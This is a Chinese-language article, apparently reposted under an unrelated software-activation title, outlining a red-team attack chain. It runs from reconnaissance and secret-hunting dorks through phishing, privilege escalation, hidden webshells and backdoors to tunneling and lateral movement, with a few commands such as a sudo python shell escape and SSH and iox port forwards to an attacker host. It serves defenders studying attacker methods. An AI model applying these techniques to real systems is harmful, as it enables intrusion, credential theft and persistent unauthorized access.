一、信息收集
收集的内容包括目标系统的组织架构、IT资产、敏感信息泄露、供应商信息等各个方面,通过对收集的信息进行梳理,定位到安全薄弱点,从而实施下一步的攻击行为。
域名收集
1.备案查询
- 天眼查
- 爱企查
- 官方ICP备案查询
通过以上三个平台,可以查询获得一批主域名、微博、邮箱等。
2.FOFA、Google查询:直接输入公司名称、主域名等进行搜索
3.证书查询
4.使用浏览器查询
小锁–安全连接–更多信息–查看证书(有些可能没有),可以得到一些主域名以及子域名。
5.dns查询
用dnsdumpster.com查询是否存在自建NS服务器,再将ns名带入https://hackertarget.com/find-shared-dns-servers/进行查询,可以获得一批主域名:
6.whois查询
通过查询目标的WHOIS信息,对联系人、联系邮箱等信息进行反查以及查看whois历史信息,获取更多相关的域名信息;微步在线也可以根据IP、邮箱等查询历史域名。
7.通过众测平台查询资产范围,在众测平台上有些厂商会把资产范围放出来。
8.通过主域名对子域名进行搜索,可使用工具、搜索引擎等。
9.直接访问收集到的主域名,对网页上指向的域名链接进行收集(可能会放一些OA等办公系统的跳转)。
10.枚举域名
https://github.com/infosec-au/altdns, Altdns是一个DNS侦察工具,允许发现符合模式的子域。Altdns接收可能出现在域下的子域中的单词(如 test、dev、staging),并接收您知道的子域列表。
11.收集应用资产
11.1 天眼查、企查查
11.2 微信APP搜索(小程序、公众号)
11.3 支付宝搜索(小程序、公众号)
11.4 工具ENScan(可查询企业APP信息、微信公众号信息、供应商信息等)
11.5 APP 查找应用商店、豌豆荚(可下载历史app)
11.6 PC可通过官网进行查找下载
12.根据前几种方式获取相关IP,然后探测可能存在的C段,可获取一些没有相关联信息的隐藏资产,再通过IP反查域名(https://github.com/Sma11New/ip2domain)
IP收集
1.真实IP查找
CDN判断:
- 多地ping,全球ping,查看解析IP是否一致;
- NSlookup:通过nslookup查看不同DNS域名解析情况来判断是否使用了CDN;
- 在线检测:https://www.cdnplanet.com/tools/cdnfinder/;
- 通过https证书:有的cdn颁发的证书带有cdn名称,可通过https证书进行cdn识别; 真实IP查找:
- 通过查询历史DNS记录站点在做CDN之前可能将域名解析到真实IP,通过查询DNS历史记录可能会找到CDN使用前的真实IP;
- 子域查询法:CDN服务的使用成本还是挺高的,所以很多的站点只对流量大的主站做了CDN,这种情况下我们通过子域枚举就能获取到子站的真实IP,再进行C段;
- 全球ping:很多CDN厂商因为某些原因仅对国内线路做了解析,这种情况下使用国外主机直接访问就可能获取到真实IP;
- 通过网站漏洞,如:phpinfo;
- 需要找xiaix.me网站的真实IP,我们首先从apnic获取IP段,然后使用Zmap的banner-grab扫描出来80端口开放的主机进行banner 抓取,最后在http-req中的Host写xiaix.me;
- 利用应用功能,抓取反向连接查找服务器IP,或者根据应用返回/报错查看。 2.通过IP地址注册信息查询:https://ipwhois.cnnic.net.cn/
3.对上面域名解析获得的单个IP输入查询框,会有一个IP范围
4.使用FOFA等互联网资产收集工具直接搜索公司名称
5.C段扫描
- rustscan:速度快;
- goby:图形化直观,支持漏洞验证,端口扫描;
- fscan:速度快,主机存活探测、端口扫描、常见服务的爆破。
敏感信息收集
1.利用Google
- Google常用语法:site:*.test.cn filetype:xlsx 学号 site:*.test.cn filetype:docx | pdf | csv | json
- 搜集管理后台:site:xxx.com 管理、site:xxx.com admin、site:xxx.com login 搜集mail:site:xxx.com intext:@xxx.com 搜集敏感web路径:site:xxx.com intitle:登录/site:xxx.com inurl:sql.php
- site:*.xxx.com intext:Index of/
- 其他语法:https://www.exploit-db.com/google-hacking-database2.利用托管平台,如:GitHub、码云等
GitHub常用语法:
- 敏感信息:xx.com “关键字”
- 文件搜索:xxx.com filename:properties
- 关键字:Passwords api_key “api keys” authorization_bearer: oauth auth authentication client_secret api_token: “api token” client_id password user_password user_pass passcode client_secret secret password hash OTP user auth注意事项:如果搜索含有空格的查询,需要用引号将其括起来;
3.目录扫描
- 备份文件/默认后台
- 源码泄露(.git/.svn) 通过上面的收集能拿到:域名、IP、邮箱、姓名、手机号等,但需要验证是否属于该单位资产,以及需要对域名以及IP进行存活探测、端口扫描、web指纹识别、目录扫描等,快速定位到易被攻击的系统,从而实施进一步攻击。
存活探测,敏感资产定位
- https://github.com/EASY233/Finger:一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具;
- https://github.com/al0ne/Vxscan:python3写的综合扫描工具,主要用来存活验证,敏感文件探测(目录扫描/js泄露接口/html注释泄露),WAF/CDN识别,端口扫描,指纹/服务识别等;
- https://github.com/EdgeSecurityTeam/EHole:在信息收集期间能够快速从C段、大量杂乱的资产中精准定位到易被攻击的系统,从而实施进一步攻击。
二、建立据点
在找到薄弱点后,红队会尝试利用漏洞或社工等方法去获取外网系统控制权限。在这个过程中,红队成员往往会使用最少流量动作去尝试突破边界防御,找到与内网连接的通道,这种由外到内的过程一般称之为纵向渗透,当初步获得权限后,若权限不够会进行提权,在进行稳固权限、建立隧道;
常见打点思路:
- 社工钓鱼:通过在线客服、私信好友等多种交互平台进行社工攻击,以便更加高效地获取业务信息。社工手段的多变性往往会让防守方防不胜防;
- 近源渗透:通过乔装、社工等方式实地物理侵入企业办公区域,通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”;
- 设备、系统应用弱口令;
- 利用边界网络设备、安全设备漏洞,通过设备VPN搭建隧道;
- web漏洞:shiro反序列化、struts2 漏洞、Log4j漏洞、Spring框架漏洞、逻辑漏洞、中间件漏洞等;
- 利用小程序、公众号、APP漏洞;
- 对CMS、备份泄露的源代码进行审计,使用0Day;
- 利用旁站、子公司、供应链进行迂回打击。
内网信息收集点
Windows
1.本机信息收集(涉及判断:我是谁?我在哪?这是哪?)
2.常见默认配置文件位置
3.SPN
SPN:服务主体名称,使用Kerberos须为服务器注册SPN,因此可以在内网中扫描SPN,快速寻找内网中注册的服务。
4.会话、连接收集
5.浏览器下载记录、书签、浏览历史以及浏览器保存的密码等
github:https://github.com/djhohnstein/SharpChromium //cookie,passwd,history查看
6.WIFI密码
7.任务计划(有些任务执行时需要将用户名和密码一起附上)、远程桌面连接记录等
Linux(CentOS 7)
1.系统版本信息
2.系统环境变量
3.服务、网络连接以及进程
4.查看安装程序
5.常见配置、敏感文件
6.查看任务计划
7.可能有哪些纯文本用户名和密码
8.用户信息
9.历史记录
提权
1.基本概念
Windows常见权限分类:
Linux权限分类:
通常有两种提权方式,纵向提权及横向提权;纵向提权指的是低权限角色获取高权限角色的权限、横向提权指在系统A中获取了系统B中同级别的角色权限。常用提权方法有系统内核溢出漏洞提权、服务器中间件漏洞提权、数据库提权、其它第三方组件提权。
2.Windows提权
2.1 提权辅助脚本
2.2 msf提权
2.2.1 使用getsystem(权限为Administrator时大概率会成功,其他可能需要绕UAC)
2.2.2 会话派发到msf使用suggester辅助脚本提权
2.3 提权
适用版本:Windows 7、8、10、2008、2012
SweetPotato.exe -a whoami
2.4 DLL劫持提权
使用msf生成一个DLL,替换掉应用的dll,等待应用重启(需要提前在本地测试)
3.Linux提权
3.1 内核溢出提权
- uname -a 查看系统版本和内核信息
- 使用searchsploit在kali 查找相关内核漏洞 3.2 sudo提权
常规提权:(需要当前用户密码,如果管理员在/etc/sudoers配置了某些命令免密码使用,则可以利用该命令进行提权) 利用find
python命令提权sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’其他漏洞CVE-2019-14287、CVE-2021-3156
3.3 suid提权
① 查找具有suid权限文件:
执行命令:
② nmap(旧版本的 Nmap(2.02 到 5.21)具有交互模式,允许用户执行 shell 命令)
③ vim Vim 的主要用途是作为文本编辑器。但是,如果它作为 SUID 运行,它将继承 root 用户的权限,因此它可以读取系统上的所有文件。
3.4 su
3.5 任务计划
在发现有一些计划任务时,我们就可以去检查是否存在一些问题导致权限的提升; 如权限配置不当777的执行脚本,则可以修改脚本内容进行提权;
权限维持
1.反弹shell
2.webshell
① 内存马隐藏 ② 通过attrib隐藏文件,在使用ADS流隐藏webshell需要和文件包含配合
3.系统后门
Windows ① 利用任务计划定时反弹会话 ② 利用开机启动项 ③ 影子账户以及guest账户 ④ 注册表 ⑤ 系统工具后门(shift后门) ⑥ WMI后门 ⑦ DLL劫持 ⑧ 进程注入 Linux ① ssh、openssh后门 ② 任务计划 ③ VIM后门 ④ 添加超级用户 ⑤ SUID后门 ⑥ 利用自启动程序 ⑦ rootkit后门
4.利用IIS等服务制作后门维持权限
常用隧道建立工具
4.1 探测是否出网
- ICMP:ping IP;
- TCP:nc -zv ip 端口;
- HTTP:curl www.xxx;
- DNS:nslookup [www.baidu.com] 4.2 网络层常用隧道
4.2.2 IPv6隧道
kali自带,6tunnel是一个隧道工具,可以从ipv6到ipv4,也能从ipv4到ipv6。
使用:
首先开启目标机上的IPV6,ipconfig查看ipv6地址 kali:6tunnel -4 80 targetipv6IP 80 #这条命令的含义就是将目标机的80端口(目标机使用IPV6地址)转发到本机的80端口上(本机使用IPV4地址)转发成功后,访问本机80端口便可以访问到目标机上正在运行的web服务;
4.3 传输层常用隧道
4.3.1 IOX
github:https://github.com/EddieIvan01/iox
使用,比如我们将内网的3389端口转发到我们的attackhost:
socks代理
修改/etc/proxychains.conf
在本地0.0.0.0:1080启动Socks5服务
https://blog.csdn.net/2301_/article/details/iox proxy -l 1080
在被控机开启Socks5服务,将服务转发到公网attackhost
在attackhost上转发0.0.0.0:9999到0.0.0.0:1080
你必须将两条命令成对使用,因为它内部包含了一个简单的协议来控制回连
接着连接内网主机
4.4 应用层常用隧道
4.4.1 SSH
SSH常用参数:
4.4.2 本地端口转发
//攻击机:192.168.1.1 web服务器:192.168.1.2 数据库服务器:192.168.1.3,攻击机无法访问数据库服务器,但可以访问web服务器且已获得web服务器的权限,web服务器和数据库服务器可以互相访问的场景 攻击机执行:ssh -fCNg -L 2022:192.168.1.1:3389 root@192.168.1.2 -p 22 //攻击机去连接web服务器,连上之后由web服务器去连接数据库服务器的3389端口并把数据通过SSH通道传给攻击机,此时在攻击机访问本地2022端口即可打开数据库服务器的远程桌面
4.4.3 远程转发
//攻击机无法访问数据库服务器,也无法访问web服务器但已获得web服务器的权限,web服务器和数据库服务器可以互相访问,web服务器可以访问具有公网IP的攻击机,通过访问攻击机本机的2022端口来访问数据库服务器的3389端口 在web服务器上执行:ssh -CfNg -R 2022:192.168.1.3:3389 root@192.168.1.1 此时在攻击机访问本地2022端口即可打开数据库服务器的远程桌面
4.4.4 动态转发
① 攻击机执行:ssh -CfNg -D 2022 root@192.168.1.2 ② 本地设置socks代理后即可访问数据库服务器
4.6 DNS(iodine) 要使用此隧道,您需要一个真实的域名(如mydomain.com),以及一个具有公共 IP 地址的服务器以在其上运行iodined;
三、横向移动
通常进入内网后,同样会进行内网信息收集、域内信息收集,在通过收集的信息进行内网漫游横向渗透扩大战果,在内网漫游过程中,会重点关注邮件服务器权限、OA系统权限、版本控制服务器权限、集中运维管理平台权限、统一认证系统权限、域控权限等位置,尝试突破核心系统权限、控制核心业务、获取核心数据,最终完成目标突破工作。
内网主机存活探测
1.ICMP
4.nmap
内网主机端口探测
1.单个端口探测
2.多个端口探测
通过代理后使用nmap、msf进行扫描
横向移动方法:
- 利用ms17010等系统漏洞
- 对跳板机密码进行抓取,使用抓取到密码爆破内网其他主机
- 利用EDR、堡垒机、云管平台、vmware esxi等集权系统漏洞
- 使用内网邮件服务进行邮件钓鱼
- 利用IPC$横向移动
- smb爆破
- 对管理端口、数据库进行弱口令爆破
- 未授权访问漏洞
- 域渗透相关漏洞
- 虚拟机逃逸
- … 从信息收集、建立据点到横向移动,以上红队常用的攻击方法及路径;企业可以从中反思审查自身安全漏洞,补齐和完善应有的防御措施,力求从多方位全面保障自身安全。
Navicat Premium 11.2.17激活
今天的文章
Navicat Premium 11.2.17激活(网络安全红队常用的攻击方法及路径)分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/114720.html